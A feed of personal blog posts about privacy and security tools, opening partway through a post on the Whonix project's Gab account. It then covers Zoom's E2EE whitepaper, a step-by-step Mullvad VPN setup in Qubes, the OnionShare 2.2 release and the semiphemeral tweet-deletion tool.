<p>On June 14, I wrote Patrick an encrypted email myself asking about the project's affiliation with Gab and demanding that they either stop this affiliation or remove my name and photo from the Whonix website:</p>
<blockquote><p>Hey Patrick,</p>
<p>A few people have pointed out to me that the footer on the Whonix wiki includes a social media link to Whonix's Gab profile. Why does Whonix have an account on an explicitly racist, neo-Nazi social network? The people who run Gab don't in any way actually give a shit about "free speech" -- it's just a transparent excuse to be able to grow their
fascist movement within liberal democracies, but luckily most people aren't falling for it.</p>
<p>I don't feel comfortable associating with fascists or in any way supporting their movements. Can you delete the Whonix Gab account, which only has 38 followers anyway, and remove the link to Gab from the wiki? Or if you don't want to do that, can you remove my name, photo, and quote from the homepage of whonix.org?</p>
</blockquote>
<p>He never responded to my email. But last week he <a href="https://github.com/Whonix/Whonix-Website/commit/a9f55ce9f2341de27e3cd74326654e7f724156cd">updated the code</a> of the Whonix website to remove my quote, and today he deployed the update, so I'm no longer on the homepage anymore.</p>
<p>I've heard from other people who work in open source digital security tools that they have also contacted Patrick and the Whonix project about this.</p>
<p>Whonix could have possibly had a logical explanation for using and promoting Gab. Like, <a href="https://forums.whonix.org/t/long-wiki-edits-thread/3477/1016">maybe</a> Patrick believed the disingenuous marketing about Gab being a free speech social network rather than an explicitly neo-Nazi one.</p>
<p>But if that were the case, he sure isn't answering anyone's questions. Instead, he's steadfastly refusing to budge or explain himself, despite funders and contractors fleeing the project because they don't want to work with fascists.</p>
<p>==</p>
<h3 id="april-5-2022-update">April 5, 2022 Update</h3><p>After talking with Tempest (@JetBlackCloud on Twitter), I decided to change the title of this blog post from "Is the Whonix project run by fascists?" to "Problematic behavior from the Whonix project" because it's more accurate.</p>
<p>I also wanted to provide some updates:</p>
<p>Whonix removed a link to its Gab account from its website in late 2020. The first version of the Whonix site <a href="https://web.archive.org/web/20201030071636/https://www.whonix.org/wiki/Documentation">captured by the Internet Archive</a> that removed the link to Gab was on October 30, 2020, four months after this post was published. The project still technically has a <a href="https://gab.com/Whonix">Gab account</a> but it hasn't posted since November 20, 2021, while it still consistently posts to its <a href="https://twitter.com/Whonix">Twitter account</a>.</p>
<p>I'm not sure why Whonix decided to stop using Gab, but my guess is for the reason that should have been obvious from the beginning: It makes the project look bad.</p>
<p>According to Tempest, the "We miss Jacob Appelbaum" tweet was posted by a problematic Whonix moderator called <a href="https://forums.whonix.org/u/tnt_bom_bom/activity">TNT_BOM_BOM</a>, which is why the tweet ended with "^TNT". That checks out. TNT also signed some of the posts to Gab. Based on his forum posts, TNT is still an active Whonix community members.</p>
<p>Patrick never responded to me or the people I quoted in this blog post, and as far as I can tell, the Whonix project ever really responded to this at all (other than I guess eventually stop using Gab). The closest thing that can be found to a response was in this <a href="https://forums.whonix.org/t/whonix-is-loosing-their-antifacist-supporters/9844">forum thread</a> where the user torjunkie points out some new additions to the wiki:</p>
<ul>
<li>Whonix added an <a href="https://www.whonix.org/wiki/Warning#Unsubstantiated_Conclusions">Unsubstatiated Conclusions</a> section to its wiki that says, "Users must be careful not to draw incorrect conclusions based on the existence of specific Whonix ™ communication channels, community software utilized, applications installed on the platform, or the availability of certain wiki entries."</li>
<li>Whonix added a <a href="https://www.whonix.org/wiki/Official_Online_Profiles#Selection_of_Platforms">Selection of Platforms</a> section to its wiki that says that one of the "non-criteria" for picking a platform to create an account on is "ethical or political considerations," and that creating an account is not an endorsement of that social network.</li>
</ul>
<p>I also never found any technical issues with the Whonix project. It's open source and appears to follow best practices. I don't think the problematic behavior says anything about whether or not its safe to rely on Whonix. While I think parts of Whonix are a bit over-engineered, I still use it myself inside Qubes.</p>
<p>Gab has changed in the years since then too. It was founded by explicit neo-Nazis in the aftermath of the deadly 2017 Charlottesville fascist protest as part of the <a href="https://en.wikipedia.org/wiki/Alt-tech">alt-tech</a> movement, but now it's home to a more diverse far-right audience including people who aren't explicitly fascist, like MAGA/Stop the Steal/QAnon conspiracy types and anti-vaxxers.</p>
Twitter Thread: Live-tweeting Zoom's E2EE whitepaper2020-05-26T00:00:00ZMicah Leeurn:uuid:cfbbf5a4-9513-37b7-81fe-bd45d76ebf51<p><em>Background: This is an archived Twitter thread. For more information, read: <a href="../../../2023/05/elon-banned-me-from-twitter-for-doing-journalism-good-riddance/">Elon banned me from Twitter for doing journalism. Good riddance.</a></em></p>
<p>Original URL of Twitter thread: <a href="https://twitter.com/micahflee/status/1265407886999482368">https://twitter.com/micahflee/status/1265407886999482368</a></p>
<hr>
<p>I’m sitting outside during quarantine reading Zoom’s new “E2E Encryption for Zoom Meetings” and it’s pretty interesting.</p>
<p>First things I notice: I recognize some of these names, and it uses a Creative Commons license!</p>
<p><img src="image1.jpg" alt=""></p>
<p><em>Posted 3:22 PM · May 26, 2020, 178 Retweets, 410 Likes</em></p>
<hr>
<p>It’s also refreshingly honest about Zoom’s security limitations. A complete 180 compared to before the pandemic when Zoom was basically like “no worries we’re unhackable”</p>
<p><img src="image2.jpg" alt=""></p>
<p><em>Posted 3:22 PM · May 26, 2020, 6 Retweets, 44 Likes</em></p>
<hr>
<p>They include themselves in their threat model now! This is important because as a US company, and a company that operates all over the world (including China), governments can force Zoom (and any company) to spy on their users. The only way to mitigate this threat is real E2EE</p>
<p><img src="image3.jpg" alt=""></p>
<p><em>Posted 3:22 PM · May 26, 2020, 8 Retweets, 52 Likes</em></p>
<hr>
<p>While I’d love it if it were some day in scope, I’m glad they acknowledge that even with E2EE they’re not attempting to protect metadata: who is meeting with who, when, and from where</p>
<p><img src="image4.jpg" alt=""></p>
<p><em>Posted 3:22 PM · May 26, 2020, 23 Likes</em></p>
<hr>
<p>They’re planning on incrementally implementing E2EE in four phases. I like this because it means we’ll be able to have E2EE (albeit imperfect) Zoom meetings sooner.</p>
<p>When using a meeting in E2E mode, everyone will have to use the Zoom app: no web app, dial in, etc</p>
<p><img src="image5.jpg" alt=""></p>
<p><em>Posted 3:26 PM · May 26, 2020, 5 Retweets, 25 Likes</em></p>
<hr>
<p>In phase 1, meetings will be E2EE but you still have to trust Zoom’a servers: they could do an active attack to spy on a meeting (like FaceTime or iMessage). But by phase 4, Zoom accounts are basically like Keybase accounts- using existing devices to add new devices</p>
<p><em>Posted 3:28 PM · May 26, 2020, 3 Retweets, 27 Likes</em></p>
<hr>
<p>Phase 1 will have a “meeting security code”. The host can read it out loud, and all participants can compare it, and if it matches for everyone it means there is no MITM attack.</p>
<p>Already, this is better than Webex, which currently supports E2EE but doesn’t let you verify it</p>
<p><img src="image6.jpg" alt=""></p>
<p><em>Posted 3:31 PM · May 26, 2020, 6 Retweets, 33 Likes</em></p>
<hr>
<p>Interesting. “No secret key or unencrypted meeting contents will be provided to Zoom infrastructure servers” except for abuse reporting — seems reasonable</p>
<p><img src="image7.jpg" alt=""></p>
<p><em>Posted 3:33 PM · May 26, 2020, 1 Retweet, 14 Likes</em></p>
<hr>
<p>Describing a bunch of cryptographic algorithms they’re planning to use</p>
<p><img src="image8.jpg" alt=""></p>
<p><em>Posted 3:37 PM · May 26, 2020, 10 Likes</em></p>
<hr>
<p>Every Zoom device generates and stores a long term signing keypair which never leaves that device.</p>
<p>❤️ public key crypto</p>
<p><img src="image9.jpg" alt=""></p>
<p><em>Posted 3:40 PM · May 26, 2020, 2 Retweets, 26 Likes</em></p>
<hr>
<p>Each device has a keypair, but additionally each time you join a meeting you generate a new ephemeral keypair just for that meeting, signs it with their long term keypair.</p>
<p>This is what’s used to encrypt the meeting’s symmetric session key for each participant</p>
<p><img src="image10.jpg" alt=""></p>
<p><em>Posted 3:45 PM · May 26, 2020, 1 Retweet, 19 Likes</em></p>
<hr>
<p>As people leave and join the meeting, the shared meeting key gets rekeyed. So if you join for a second, get the key, then leave/get kicked out, you can’t spy on the rest of the meeting (assuming you can observe the network)</p>
<p><img src="image11.jpg" alt=""></p>
<p><em>Posted 3:47 PM · May 26, 2020, 19 Likes</em></p>
<hr>
<p>Nice. When you leave a meeting, your client destroys all ephemeral keys used during the meeting to provide “forward secrecy” — an attacker that records an encrypted meeting can’t later decrypt it after stealing keys from a device</p>
<p><img src="image12.jpg" alt=""></p>
<p><em>Posted 3:51 PM · May 26, 2020, 1 Retweet, 17 Likes</em></p>
<hr>
<p>Ooh it looks the meeting security code will be encoded as basically a dice ware passphrase.</p>
<p>And “if deep fake technology is a concern” you can verify the meeting is secure out of band, like in a Signal group with all participants</p>
<p><img src="image13.jpg" alt=""></p>
<p><em>Posted 3:55 PM · May 26, 2020, 1 Retweet, 10 Likes</em></p>
<hr>
<p>If people join or leave a meeting, and the meeting gets rekeyed, then everyone has to re-compare the security code. That makes sense</p>
<p><img src="image14.jpg" alt=""></p>
<p><em>Posted 3:59 PM · May 26, 2020, 9 Likes</em></p>
<hr>
<p>Phase 2 is all about identity. Each user makes signed statements when they add new devices and revoke devices, and these statements are part of a signature chain so a malicious server can’t replay or emit any of them</p>
<p><em>Posted 4:06 PM · May 26, 2020, 11 Likes</em></p>
<hr>
<p>There’s also a signature chain full of contact list updates - you keep track of the device keys you notice for everyone you have meetings with, so you can tell if someone joins from an unrecognized (possibly faked) device</p>
<p><img src="image15.jpg" alt=""></p>
<p><em>Posted 4:10 PM · May 26, 2020, 12 Likes</em></p>
<hr>
<p>Phase 3 introduces a transparency tree, similar to Certificate Transparency. It ensures that Zoom tells all users the same info about who has what key — meaning if an insider performs a MITM attack against users, there will be a public auditable evidence trail</p>
<p><em>Posted 4:14 PM · May 26, 2020, 2 Retweets, 12 Likes</em></p>
<hr>
<p>The Zoom Transparency Tree concept is incredibly similar to how Keybase does a good job at multiple device support. You can see Keybase experience making its way into this doc</p>
<p><img src="image16.jpg" alt=""></p>
<p><em>Posted 4:19 PM · May 26, 2020, 1 Retweet, 19 Likes</em></p>
<hr>
<p>Phase 4 introduces “real-time security”, making it so a malicious server simply doesn’t have the ability to add a fake device for a user, and the device needs to be added using an existing device (like by scanning a QR code)</p>
<p><img src="image16.jpg" alt=""></p>
<p><em>Posted 4:22 PM · May 26, 2020, 1 Retweet, 11 Likes</em></p>
<hr>
<p>Hah, the conclusion says this white paper proposes bringing E2EE to Zoom “as that term is best understood by security experts” — clearly this is a reference to my and @yaelwrites’a reporting <a href="https://theintercept.com/2020/03/31/zoom-meeting-encryption/">https://theintercept.com/2020/03/31/zoom-meeting-encryption/</a></p>
<p><em>Posted 4:25 PM · May 26, 2020, 2 Retweets, 27 Likes</em></p>
<hr>
<p>Overall, I’m very excited about this new proposal. Zoom is taking this stuff seriously and hired good people to make it happen. Honestly it’s way more than I expected. I’m glad journalists looked so deeply into Zoom’s security and privacy. That journalism is having real impact</p>
<p><em>Posted 4:28 PM · May 26, 2020, 13 Retweets, 58 Likes</em></p>
<hr>
<p>Link to paper: <a href="https://github.com/zoom/zoom-e2e-whitepaper/blob/master/zoom_e2e.pdf">https://github.com/zoom/zoom-e2e-whitepaper/blob/master/zoom_e2e.pdf</a></p>
<p><em>Posted 4:39 PM · May 26, 2020, 6 Retweets, 26 Likes</em></p>
<hr>
<p>One last thing! Zoom says E2EE will only be available to paid accounts, but I hope they change their mind and make it available to free accounts too -- it's a valuable feature, but <em>everyone</em> deserves privacy, not just rich people and companies</p>
<p><em>Posted 4:48 PM · May 26, 2020, 17 Retweets, 51 Likes</em></p>
Using Mullvad VPN in Qubes2019-11-01T00:00:00ZMicah Leeurn:uuid:fb28f10c-be0d-362d-8adc-c508dbc31a1a<p>A friend wanted my help configuring <a href="https://mullvad.net/en/">Mullvad VPN</a> on their Qubes computer. Instead of just helping them, I decided to write a quick blog post explaining how I normally set up VPNs in Qubes. There are many different ways -- Mullvad even has its own <a href="https://mullvad.net/en/help/qubes-os-4-and-mullvad-vpn/">Qubes guide</a> -- but I prefer using NetworkManager system tray applets, so I can always see if my VPN is connected or not. I also use a simple script that I set to run when my AppVM boots to automatically connect to the VPN, and reconnect if it disconnects, and Qubes firewall rules to prevent non-VPN internet traffic from sneaking by.</p>
<p>First, create a new VM called <code>vpn-mullvad</code>. Use the latest Fedora template you have (<code>fedora-30</code> in my case), and make sure to set networking to <code>sys-firewall</code> and not <code>default (sys-firewall)</code>. Finally, check both the "provides network" and "launch settings after creation" boxes. ("Provides network" means this new VM will be able to provide internet access to other VMs.)</p>
<p><img src="qubes-mullvad-create.png" alt=""></p>
<p>When the <code>vpn-mullvad</code> settings open, switch to the "Services" tab and add a service called <code>network-manager</code>, and click ok. This will make it so that when this VM boots up, you'll have a NetworkManager system tray applet in the top-right corner of your screen.</p>
<p><img src="qubes-mullvad-services.png" alt=""></p>
<p>Now, open a web browser in a disposable VM (click the Qubes menu, then <code>Disposable: fedora-30-dvm</code>, <code>fedora-30-dvm: Firefox</code>), and <a href="https://mullvad.net/en/account/login/">login</a> to your Mullvad account at mullvad.net. Once you're logged in, go to Mullvad's <a href="https://mullvad.net/en/download/config/">OpenVPN configuration file generator</a>. Set your platform to <code>Linux</code>, choose a location, and make sure to check <code>Use IP addresses</code>. Then click download. (In my case, since I'm setting up this VPN to go to Canada, I'm downloading the file <code>mullvad_config_linux_ca.zip</code>.)</p>
<p><img src="qubes-mullvad-openvpn-config-generator.png" alt=""></p>
<p>Now open a file manager in your disposable VM that contains the file you just downloaded.</p>
<p><img src="qubes-mullvad-open-folder.png" alt=""></p>
<p>And copy it to your <code>vpn-mullvad</code> VM. (This will probably boot that VM for the first time.)</p>
<p><img src="qubes-mullvad-copy1.png" alt="">
<img src="qubes-mullvad-copy2.png" alt=""></p>
<p>Now open a file manager in your <code>vpn-mullvad</code> VM (click the Qubes menu, <code>Service: vpn-mullvad</code>, <code>vpn-mullvad: Files</code>). Navigate to the <code>QubesIncoming</code> folder, then the folder inside that that's the name of your disposable VM (in my case, <code>disp9309</code>). You should see the zip file with the Mullvad OpenVPN config. Right-click on it and choose "Extract Here". Then drag the extracted folder (<code>mullvad_config_linux_ca</code>, in my case) to <code>Documents</code>. Then, navigate inside this folder, and you should see your VPN config files.</p>
<p><img src="qubes-mullvad-files.png" alt=""></p>
<p>Also, you might notice that when your <code>vpn-mullvad</code> VM booted up, there is a new NetworkManager applet in your system tray. Click on it, go to <code>VPN Connections</code>, <code>Add a VPN connection...</code>.</p>
<p><img src="qubes-mullvad-systray.png" alt=""></p>
<p>Then choose <code>Import a saved VPN configuration...</code> from the dropdown list, and click Create.</p>
<p><img src="qubes-mullvad-import-vpn1.png" alt=""></p>
<p>Then browse for the Mullvad <code>.conf</code> file in your <code>Documents</code> folder.</p>
<p>Back in your file manager, double click on <code>mullvad_userpass.txt</code> -- this will should you what to put into the username and password fields.</p>
<p><img src="qubes-mullvad-import-vpn2.png" alt=""></p>
<p>Then click save. This will popup a window asking you to choose a password for the default keyring -- you can just leave it blank and click continue, and click continue again to confirm you want to store passwords unencrypted. (Everything on your computer is actually encrypted with full disk encryption, and you won't be running any other software in this VM that could access these files.)</p>
<p><img src="qubes-mullvad-keyring-password.png" alt=""></p>
<p>Now you should be able to click the <code>vpn-mullvad</code> NetworkManager system tray icon, click <code>VPN Connections</code>, and connect to the new VPN you just added. It should attempt to connect, and if all goes well you should see a notification that says, "VPN connection has been successfully established," and the NetworkManager icon should have a little lock next to it.</p>
<p><img src="qubes-mullvad-connect.png" alt=""></p>
<p>Now, let's make this VPN automatically connect whenever it boots up. Open a terminal in <code>vpn-mullvad</code> (click Qubes, <code>Service: vpn-mullvad</code>, <code>vpn-mullvad: Terminal</code>), and run:</p>
<pre><code>sudo gedit /rw/config/autovpn.sh
</code></pre>
<p>This will open up a blank file using gedit (feel free to use whatever text editor you prefer). Copy and paste this script into it. You may need to change the line that says <code>nmcli con up mullvad_ca</code> to use the name of the VPN config that you added, assuming you chose a location other than Canada.</p>
<pre><code>#!/bin/bash
while [ "true" ]
do
if nmcli con |grep -Fq tun0
then
echo "Already connected, sleeping 5"
sleep 5
else
echo "Connecting"
nmcli con up mullvad_ca
fi
done
</code></pre>
<p>Then save this file and quit the editor. This script basically checks to see if you're connected to the VPN. If you are, it waits 5 seconds and checks again. If you're not, it connects you to the VPN. And it loops forever -- so that if you ever get disconnected, it will detect this and automatically reconnect.</p>
<p>Back in your terminal, make it executable:</p>
<pre><code>sudo chmod +x /rw/config/autovpn.sh
</code></pre>
<p>And now edit your <code>rc.local</code> file:</p>
<pre><code>sudo gedit /rw/config/rc.local
</code></pre>
<p>Add <code>sudo -u user /rw/config/autovpn.sh &</code> to the end of this file, and save and exit.</p>
<p><img src="qubes-mullvad-rclocal.png" alt=""></p>
<p>The <code>rc.local</code> script, which gets run every time the VM boots up, will now run the <code>autovpn.sh</code> script in the background.</p>
<p>Go ahead and try it out! Power off the <code>vpn-mullvad</code> VM (click the Qubes logo in the system tray, then <code>vpn-mullvad</code>, <code>Shutdown</code>), and then power it on again (you can open the file manager in that VM again). The VPN should automatically connect.</p>
<p>Now, let's prevent some leaks. It's common for programs on your computer to try to do stuff on the internet while your VPN isn't connected -- maybe it hasn't connected yet, or it got disconnected for some reason. We can use Qubes firewall rules to prevent the <code>vpn-mullvad</code> from communicating with anything except for the VPN servers that it's configured to connect to, so if (for example) your VPN gets disconnected but you have a web browser open, your browser won't load anything from your real IP address -- that traffic will get dropped by the firewall.</p>
<p>In a file manager in <code>vpn-mullvad</code>, go to the folder that contains your Mullvad OpenVPN config files, and open the <code>.conf</code> file. You'll see a list of lines that start with <code>remote</code> -- these are the various OpenVPN servers that Mullvad is configured to try connecting to. (In my case, these are in Montreal, Toronto, and Vancouver.)</p>
<p><img src="qubes-mullvad-remotes.png" alt=""></p>
<p>Now open the settings for <code>vpn-mullvad</code> (click the Qubes menu, go to <code>Service: vpn-mullvad</code>, <code>vpn-mullvad: Qubes Settings</code>) and switch to the "Firewall rules" tab. You can add a new rule to allow each of these IP addresses through, and blocking all other IPs.</p>
<p>But before we do, a quick note about Qubes firewall rules. For some reason, Qubes seems to choke if you have too many of them (more than maybe 20). So for example, if you set up Mullvad to choose servers in the US, then there will be way too many servers in the list. So, before proceeding, delete some of them from this file to bring it down to a more managable number of servers. If you do this, make sure to delete your VPN in NetworkManager and then add it again.</p>
<p>And also a quick note on copy and paste. There's no easy way to copy something from a VM and then paste it into <code>dom0</code>. There are good security reasons for this, but it will make this tedious work. So if you want to copy and paste, you can actually just view this file directly from <code>dom0</code>. Open a terminal in <code>dom0</code> (click the Qubes menu, and open <code>Terminal Emulator</code>). Then run this:</p>
<pre><code>qvm-run --pass-io vpn-mullvad 'cat ~/Documents/mullvad_*/*.conf' | grep "remote "
</code></pre>
<p>This will show you all of the <code>remote</code> lines from your OpenVPN config file, but inside your <code>dom0</code> terminal, and you <em>can</em> copy from this window to paste into the Qubes firewall rules.</p>
<p><img src="qubes-mullvad-remotes-dom0.png" alt=""></p>
<p>Now, back in the <code>vpn-mullvad</code> settings window, in the firewall rules tab, select "Limit outgoing Internet connections to ...". Then click the plus button, and add a rule for each IP address, copying and pasting from the <code>dom0</code> terminal if you'd like. It's fine to set the protocol to "Any" for each rule.</p>
<p><img src="qubes-mullvad-firewall.png" alt=""></p>
<p>When you click ok, you're done setting up <code>vpn-mullvad</code>! It uses the NetworkManager applet, it automatically connects if it gets disconnected, and thanks to the firewall rules, as long as you set <code>vpn-mullvad</code> as your networking VM, none of your downstream VMs will make any internet connections that don't go through the VPN you just set up.</p>
<p>If you want all of your VMs use Mullvad by default, open Qubes Global Settings (Qubes menu, <code>System Tools</code>, <code>Qubes Global Settings</code>) and change "Default netVM" from <code>sys-firewall</code> to <code>vpn-mullvad</code> and click ok.</p>
<p>And finally, you may want the ability to open a browser window while not using a VPN -- like, if you connect to a public wifi network and need to click through a captive portal. I solve this problem by making a disposable VM template specifically for this purpose.</p>
<p>Open the settings for <code>fedora-30-dvm</code> (Qubes menu, <code>Displable: fedora-30-dvm</code>, <code>fedora-30-dvm: Qube Settings</code>) and click "Clone qube" -- rename this clone to <code>fedora-30-clearnet-dvm</code>. Now open the settings for <code>fedora-30-clearnet-dvm</code>, and change "Networking" from <code>default (vpn-mullvad)</code> to <code>sys-firewall</code>, and click ok.</p>
<p>Now, if you need to click through a captive portal, you can just open a browser in a <code>fedora-30-clearnet-dvm</code> disposable VM to click through it, and as soon as you have internet <code>vpn-mullvad</code> will automatically connect to Mullvad, and internet will start working on in the rest of your VMs.</p>
<p><img src="qubes-mullvad-connected.png" alt=""></p>
New version of OnionShare makes it easy for anyone to publish anonymous, uncensorable websites2019-10-13T00:00:00ZMicah Leeurn:uuid:e9532b32-0312-3315-94f2-09766d927c89<p>I’m excited to announce that OnionShare 2.2 is released! You can download it from <a href="https://onionshare.org/">onionshare.org</a>.</p>
<p>When I first wrote OnionShare in 2014, it let you anonymously and securely send files to people. It worked like this: OnionShare zips up the files, starts a local web server on your computer with a link to this zip file, makes this website accessible as a Tor onion service, and shows you the URL of the web server. You send someone this .onion URL, they load it in Tor Browser (loading the website hosted directly on your computer), and then they can download the zip file. As soon as the download is complete, OnionShare shuts down the web service.</p>
<p>In the years since then it has gotten a whole lot better (largely thanks to a <a href="https://github.com/micahflee/onionshare/wiki/Developing-OnionShare">growing community</a> of volunteer contributors). Instead of just sending files, you can use it to receive files now, allowing you to turn your computer into an <a href="https://micahflee.com/2019/02/onionshare-2/">anonymous dropbox</a>. But it has always worked the same way: hosting an anonymous website locally on your computer. But since OnionShare hosts a website on your computer anyway, why not use it to <em>host actual websites</em>?</p>
<p><img src="onionshare-website-mode.png" alt=""></p>
<p>In addition to the “Share Files” and “Receive Files” tabs, OnionShare 2.2 introduces the “Publish Website” tab. You drag all of the files that make up your website into the OnionShare window and click “Start sharing.” It will start a web server to host your static website and give you a .onion URL. This website is only accessible from the Tor network, so people will need Tor Browser to visit it. People who visit your website will have no idea who you are – they won’t have access to your IP address, and they won’t know your identity or your location. And, so long as your website visitors are able to access the Tor network, the website can’t be censored.</p>
<p>Here are some things to keep in mind about how website publishing in OnionShare works:</p>
<p>If any folder in the website that you’re sharing includes an <code>index.html</code> file, then when someone loads that folder in Tor Browser it will load that html file. If any folder doesn’t include an <code>index.html</code> file, it will show a directory listing instead. So you could, for example, publish a website that’s just a bunch of files without any html, and people who load it in Tor Browser will able to browse your files and folders and download individual files.</p>
<p><img src="onionshare-directory-listing.png" alt=""></p>
<p>When sharing something that’s not public, OnionShare now uses HTTP basic authentication. So the URLs that you share look like <code>http://onionshare:[password]@[address].onion</code> now. When someone loads the URL in Tor Browser, it will ask them if they want to login first, like this:</p>
<p><img src="onionshare-basic-auth.png" alt=""></p>
<p>When they click OK, the URL in the address bar no longer contains the <code>onionshare:[password]</code> part, and just looks like a normal website. (This protects against shoulder surfing, where an attacker looks at someone’s screen to see the OnionShare URL and visit it themselves.)</p>
<p><img src="onionshare-basic-auth-loaded.png" alt=""></p>
<p>If you want to publish your website for anyone to see, you can always go to settings and enable “public mode”, which simply doesn’t use a username and password anymore.</p>
<p>If you want to use OnionShare to publish a website that you intend to remain online for a long time, it’s important to remember that your computer itself is literally the web server. If you turn off your computer, or even just suspend your laptop, the website will go down. To prevent this, you’ll have to use a computer that’s always turned on for this. You’ll also probably want to go into settings and check “Use a persistent address” – this means that if you close OnionShare and re-open it again (for example, if you have to install updates on the computer and reboot it), the URL will stay the same the next time you start the server. If you don’t use a persistent address, every URL is temporary, and there’s no way to re-use an old URL.</p>
<p>Another thing that’s new is that OnionShare will now show you exactly what web requests people are making to your website (you get to see this when sharing and receiving files too, not just for publishing websites). For example, here’s a website hosted by OnionShare getting scanned with the <a href="https://cirt.net/nikto2">nikto</a> web vulnerability scanner.</p>
<p><img src="onionshare-nikto.png" alt=""></p>
<p>And finally, since we put in all of the work to make it so you can browse through directory listings when publishing a website, we also made it so you can similarly browse through folders that are being shared when just sharing files, so people can see exactly what files they’re about to download before downloading them.</p>
<p><img src="onionshare-share-directory-listing.png" alt=""></p>
<p>And if you go into settings and uncheck “Stop sharing after files have been sent” (this is the setting that makes the server shutdown after the first person downloads the files you’re sharing), then people will also be able to download individual files that you’re sharing, instead of only having the option to download everything at once.</p>
<p>I hope you enjoy the new OnionShare!</p>
With Semiphemeral you can delete your old Twitter likes, but it's noisy2019-07-21T00:00:00ZMicah Leeurn:uuid:afe34804-17a8-39c7-8e79-9d366866bdd8<p>I don't know if others use Twitter the same way that I do, but I tend to like things quite a bit more frequently than I tweet or retweet things. I'd imagine that if you analyzed my last 10 years of Twitter likes, you could learn much more about me than just by looking at my timeline. My likes probably reveal exactly which political, technical, and social arguments I followed, and which sides I took in all of them.</p>
<p>I recently programmed a tool called <a href="https://micahflee.com/2019/06/semiphemeral-automatically-delete-your-old-tweets-except-for-the-ones-you-want-to-keep/">semiphemeral</a> to automate deleting all of my old tweets (except for ones that I want to keep), and it also goes back and unlikes all of the tweets that I liked more than 60 days ago -- or, so I initially thought. It soon became clear that semiphemeral only actually deleted the most recent 4,000 likes.</p>
<p>I just released a new version that allows you to delete <em>all</em> of your old likes, but unfortunately there are some... caveats. (You can install semiphemeral with <code>pip3 install semiphemeral</code>, and if you already have it installed you can upgrade to the latest version with <code>pip3 install --upgrade semiphemeral</code>.)</p>
<p>Twitter works in mysterious ways. If you have a very long like history, the only way to delete your old ones is to first <em>relike</em> those tweets (yes, the tweets that you already liked), and <em>then</em> you can unlike them. This means that your friends (and strangers) will get notifications that you, for example, liked a random tweet from 2014 but by the time they open Twitter the notification will be gone, and you won't be listed in their likes for that tweet. And on top of that, running this script may take <em>weeks</em>. Twitter only allows you to like up to 1,000 tweets per day, so if you need to relike/unlike about 10,000 tweets (this is what I did), it will take about 10 days to run. I had maybe a dozen different people contact me wondering if my account was hacked.</p>
<p><img src="twitter-deleting-likes.png" alt=""></p>
<p>But why?</p>
<p>It turns out that the Twitter <a href="https://developer.twitter.com/en/docs/tweets/post-and-engage/api-reference/get-favorites-list.html">API call</a> for getting a list of tweets that a user has liked, <code>GET favorites/list</code> , doesn't work as you'd expect. It only returns the most recent 4,000 likes -- and even if you delete those and wait several days, it never returns any that are older than those. In fact, there doesn't seem to be any way at all to get the API to give you a complete list of IDs for old tweets that you liked.</p>
<p>In order to get a list of all of your old likes (since the Twitter API won't give it to you), you must go to <a href="https://twitter.com/settings/your_twitter_data">https://twitter.com/settings/your_twitter_data</a> and download your Twitter data (note that this is different than your "Twitter archive", which doesn't include information about your likes). Twitter will email you a link to a zip file. When you unzip it there will be many files, including a file called <code>like.js</code>. Run this command, with the path to your <code>like.js</code>, for example:</p>
<pre><code>semiphemeral unlike --filename ~/path/to/like.js
</code></pre>
<p>Using the <code>like.js</code> file from your Twitter data, this will first fetch all of the tweets that you liked, then it with relike and unlike each one of them. Each relike will trigger a notification, but at the end of the process your likes will have actually been deleted.</p>
<p>Each time it hits the 1,000 likes/day rate limit, semiphemeral will pause for 24 hours before continuing (if the command crashes or you cancel in the middle for any reason, it's safe to run it again to continue where you left off). If possible, I recommend you run this in a <code>screen</code> or <code>tmux</code> session on a server somewhere so that it doesn't get interrupted when you suspend your laptop. And if you're running semiphemeral on a cron job, I recommend that you disable it first, and then start it up again when it's finished.</p>
<p>New likes don't have this problem, so as long as you regularly run <code>semiphemeral delete</code>, your new likes will automatically get deleted.</p>
<p>You can find the source code and readme for semiphemeral on it's <a href="https://github.com/micahflee/semiphemeral">github project page</a>.</p>
Semiphemeral: Automatically delete your old tweets, except for the ones you want to keep2019-06-05T00:00:00ZMicah Leeurn:uuid:08bcf639-73b0-3030-9658-24dc8fefffc1<p>In the almost 10 years that I've been using Twitter, I tweeted about 13,700 times, retweeted about 9,000 tweets, and liked (or "favorited", as we called liking back in the day) about 14,000 tweets. I decided to delete most of them using a tool I just finished programming called <a href="https://github.com/micahflee/semiphemeral">semiphemeral</a>. Here is why, and how.</p>
<p>A lot of my classic tweets were... let's just say not exactly the highest quality.</p>
<p><img src="tweet-coffee-pants.png" alt=""></p>
<p>But more than just low quality, I simply don't see many benefits to having a decade-long timeline that anyone who wishes to stalk me can easily access and use against me. For example, in response to me criticizing WikiLeaks, a troll searched my Twitter history for the word "jew", dug up this 2011 tweet about me attending a Jewish wedding, and tweeted it to me with some nonsense about my "tribe".</p>
<p><img src="tweet-jewish-wedding.png" alt=""></p>
<p>And finally, in addition to mediocre tweets and the potential for harassment, I'm sure I've had some bad takes over the years.</p>
<p>I care deeply about privacy. My default search engine is DuckDuckGo. At the moment, I carry an Android phone that doesn't have any Google apps on it. I host my email <a href="https://theintercept.com/2019/04/30/helm-email-server/">from my house</a>. When I text with people on Signal I always set disappearing messages to one week, no matter the conversation. So... why should my social media posts be on the internet forever?</p>
<p>There are plenty of apps that make your tweets "ephemeral", where you can tweet like normal but everything older than, say, a month gets automatically deleted. I also found plenty of simple scripts on GitHub that do this, for those who don't want to give a third party access to their Twitter account.</p>
<p>I looked into a few options but realized none of them would work for me because I don't actually want to delete <em>all</em> of my old tweets. Some of them I'm quite proud of. Like <a href="https://theintercept.com/2014/10/28/smuggling-snowden-secrets/">that time</a> I secretly <a href="https://twitter.com/micahflee/status/296119710485979136">tweeted</a> the PGP fingerprint for Laura Poitras, at the request of Edward Snowden in the early stages of his whisleblowing, so he could be more confident that his communications with her weren't getting man-in-the-middled.</p>
<p><img src="tweet-fingerprint.png" alt=""></p>
